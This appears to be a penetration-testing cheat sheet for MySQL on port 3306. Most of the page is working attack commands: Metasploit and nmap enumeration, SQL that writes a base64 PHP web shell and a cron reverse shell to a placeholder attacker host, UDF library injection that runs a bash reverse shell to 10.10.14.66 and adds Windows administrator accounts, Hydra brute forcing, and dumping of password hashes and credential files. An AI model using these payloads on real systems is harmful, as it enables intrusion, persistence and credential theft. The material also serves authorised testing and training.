MySql - Port 3306
Become VeryLazyTech member! 🎁
Follow us on:
✖ Twitter @VeryLazyTech.
👾 Github @VeryLazyTech.
📜 Medium @VeryLazyTech.
📺 YouTube @VeryLazyTech.
📩 Telegram @VeryLazyTech.
🕵️♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚
Basic info
MySQL can be described as an open source Relational Database Management System (RDBMS) that is available at no cost. It operates on the Structured Query Language (SQL), enabling the management and manipulation of databases.
Default port: 3306
How to connect?
For local:
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
For remote
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
Enumeration
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
#msfconsole
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
Some of the enumeration actions require valid credentials
Write any binary data
Once you've used CONVERT(unhex(...), BINARY)
or CONVERT(from_base64(...), BINARY)
to generate binary data in MySQL, you can leverage it to write files directly to the filesystem using INTO DUMPFILE
. This is especially powerful when you have FILE
privileges in MySQL. For example, to drop a simple PHP web shell, you could run:
SELECT CONVERT(from_base64('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+'), BINARY)
INTO DUMPFILE '/var/www/html/shell.php';
That writes a PHP shell accessible at http://target/shell.php?cmd=id
.
You can also write binary payloads (e.g., .so
or .dll
) like this:
SELECT CONVERT(unhex('7f454c46020101000000000000000000...'), BINARY)
INTO DUMPFILE '/tmp/libexploit.so';
Or write a malicious cron job:
SELECT "* * * * * root bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'\n"
INTO DUMPFILE '/etc/cron.d/pwned';
These commands let you pivot from database access to full system compromise, persistence, or remote code execution, all without a traditional shell.
MySQL commands
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name
#Get a shell with the mysql client user
\! sh
#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
MySQL Permissions Enumeration
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();
# Get users, permissions & hashes
SELECT * FROM mysql.user;
#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';
# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
Credential Discovery
If you didn’t get lucky with anonymous login, time to brute.
🧾 Default Credentials
Common ones to try:
root:root
root:toor
admin:admin
💣 Brute Force with Hydra
hydra -L users.txt -P passwords.txt mysql://<target_ip>
⚔️ Medusa Alternative
medusa -h <target_ip> -u root -P passlist.txt -M mysql
Reading Arbitrary Files via MySQL Client Misuse
One lesser-known but powerful technique involves abusing the LOAD DATA LOCAL INFILE
feature in MySQL/MariaDB. This command, when used with the LOCAL
keyword, instructs the client (not the server) to read a local file and send it to the database server.
If an attacker can trick a victim's MySQL client (like the mysql
CLI or an app with misconfigured DB connections) into connecting to a malicious server, that rogue server can request the client to read and send any local file — leading to arbitrary file disclosure.
🔍 Vulnerable Command Example
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n';
Note the keyword LOCAL
— this is what triggers the client-side file read. If LOCAL
is omitted, and MySQL is hardened, you may see this error:
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
This behavior can be exploited by running a rogue MySQL server and luring clients into connecting to it (e.g., through phishing, SSRF, or misconfigured dev tools). You can find a working proof of concept here: 👉 Rogue MySQL Server PoC
Further reading:
Full attack walkthrough: Seebug.org Whitepaper
Simplified overview: RussianSecurity Expert
Privilege Escalation in MySQL
🔎 Check MySQL Service User
It’s especially dangerous if MySQL is running as root, as that can lead to full system compromise. Check who runs MySQL:
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
⚙️ Dangerous MySQL Configs to Look For
In /etc/mysql/my.cnf
or mysqld.cnf
, pay attention to:
user
: Account running MySQL (should NOT be root)secure_file_priv
: If unset, file import/export is unrestrictedadmin_address
: Exposed MySQL interfacesdebug
,sql_warnings
: Might expose sensitive info in logs
🔐 Extracting User Credentials and Privileges
-- Current session user
SELECT USER();
-- List all users with privileges
SELECT user, password, create_priv, insert_priv, update_priv, alter_priv, delete_priv, drop_priv FROM mysql.user;
-- Full dump with command-line
mysql -u root -p -e "SELECT * FROM mysql.user;"
👤 Create a New Privileged User
CREATE USER 'test' IDENTIFIED BY 'test';
GRANT SELECT, CREATE, DROP, UPDATE, DELETE, INSERT ON *.* TO 'test'@'%' IDENTIFIED BY 'mysql' WITH GRANT OPTION;
💻 Get a Local Shell via MySQL
\! sh
Useful in cases where your client has interactive capabilities.
🧬 Privilege Escalation via Malicious Shared Library (UDF Injection)
If MySQL is running as root or a privileged user, you can execute OS commands by injecting a User Defined Function (UDF) from a compiled .so
or .dll
.
📦 Compile UDF Library on Target (Linux)
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
🧪 Inject Library via SQL
USE mysql;
CREATE TABLE npn(line BLOB);
INSERT INTO npn VALUES (LOAD_FILE('/tmp/lib_mysqludf_sys.so'));
SHOW VARIABLES LIKE '%plugin%';
-- Example path:
SELECT * FROM npn INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
-- Create function
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
-- Run commands
SELECT sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
SELECT sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
🪟 Windows Variant
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn VALUES (LOAD_FILE('C://temp//lib_mysqludf_sys.dll'));
SHOW VARIABLES LIKE '%plugin%';
SELECT * FROM npn INTO DUMPFILE 'C://Windows//System32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
🔑 Extracting MySQL Passwords from the Filesystem
If you have file system access, here are some critical files to check:
📂 /etc/mysql/debian.cnf
/etc/mysql/debian.cnf
Contains plain-text login credentials for debian-sys-maint
:
cat /etc/mysql/debian.cnf
💾 /var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYD
Holds raw MySQL user hashes — extract like this:
grep -oaE "[-_.a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
This can give you credentials even without database access.
Enabling logging
You can enable logging of mysql queries inside /etc/mysql/my.cnf
uncommenting the following lines:

Useful files
Configuration Files
windows *
config.ini
my.ini
windows\my.ini
winnt\my.ini
<InstDir>/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf
Command History
~/.mysql.history
Log Files
connections.log
update.log
common.log
Default MySQL Databases and Tables
When MySQL or MariaDB is freshly installed, it comes with a set of default databases and system tables that play critical roles in authentication, configuration, and user management. The most important of these is the mysql
database, which stores core internal data used by the MySQL server. Inside it, you'll find sensitive tables like:
mysql.user
– Stores usernames, password hashes, and global privilegesmysql.db
– Defines database-level privilegesmysql.tables_priv
,columns_priv
– Fine-grained access control over specific tables or columnsmysql.procs_priv
– Procedure-specific privilegesmysql.roles_mapping
– Role-based access configuration (in newer versions)
These tables are often the first target during post-exploitation. By querying or dumping them, an attacker can extract valid user accounts, escalate privileges, or even inject backdoor users. For example:
SELECT user, host, authentication_string FROM mysql.user;
Accessing these default tables is essential for both privilege auditing and credential extraction, and manipulating them can allow the attacker to create new admin accounts, escalate permissions, or disable security controls. Always monitor access to the mysql
database and restrict usage to only highly trusted administrators.
ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINTS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
KEY_CACHES
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_LOCKS
INNODB_TRX
INNODB_SYS_DATAFILES
INNODB_FT_CONFIG
INNODB_SYS_VIRTUAL
INNODB_CMP
INNODB_FT_BEING_DELETED
INNODB_CMP_RESET
INNODB_CMP_PER_INDEX
INNODB_CMPMEM_RESET
INNODB_FT_DELETED
INNODB_BUFFER_PAGE_LRU
INNODB_LOCK_WAITS
INNODB_TEMP_TABLE_INFO
INNODB_SYS_INDEXES
INNODB_SYS_TABLES
INNODB_SYS_FIELDS
INNODB_CMP_PER_INDEX_RESET
INNODB_BUFFER_PAGE
INNODB_FT_DEFAULT_STOPWORD
INNODB_FT_INDEX_TABLE
INNODB_FT_INDEX_CACHE
INNODB_SYS_TABLESPACES
INNODB_METRICS
INNODB_SYS_FOREIGN_COLS
INNODB_CMPMEM
INNODB_BUFFER_POOL_STATS
INNODB_SYS_COLUMNS
INNODB_SYS_FOREIGN
INNODB_SYS_TABLESTATS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
USER_STATISTICS
INNODB_MUTEXES
TABLE_STATISTICS
INNODB_TABLESPACES_ENCRYPTION
user_variables
INNODB_TABLESPACES_SCRUBBING
INNODB_SYS_SEMAPHORE_WAITS
Learn & practice For the Bug Bounty
Last updated
Was this helpful?